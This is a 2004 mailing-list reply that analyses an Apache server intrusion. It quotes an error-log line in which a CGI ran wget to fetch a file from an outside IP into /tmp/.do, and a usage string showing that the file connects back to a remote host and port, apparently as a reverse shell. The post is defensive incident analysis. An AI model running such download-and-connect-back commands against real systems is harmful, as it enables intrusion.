13 Jan
2004
13 Jan
'04
15:11
On Tue, Jan 13, 2004 at 01:54:18PM +0100, Mátyás Tibor wrote:
I have found in /var/log/httpd/error.log
--09:06:43-- http://218.234.171.84/manual/.x/rhs => `/tmp/.do'
Some CGI at your webserver did run wget to receive some file from 218.234.171.84 and save it on your disc as "/tmp/.do". wwwrun:nogroup are standard user and group used for apache. The file is still avaiable from http://218.234.171.84/manual/.x/rhs I don't want to execute it, but strings does list some information: usage: %s <IP or hostname> <port> (/tmp/.do 163.17.51.8 9090)
connect error
probably a error message printed by /tmp/.do.
The server at 218.234.171.84 identifies itself as Apache/1.3.9 (Old!)
--
Stefan Tichy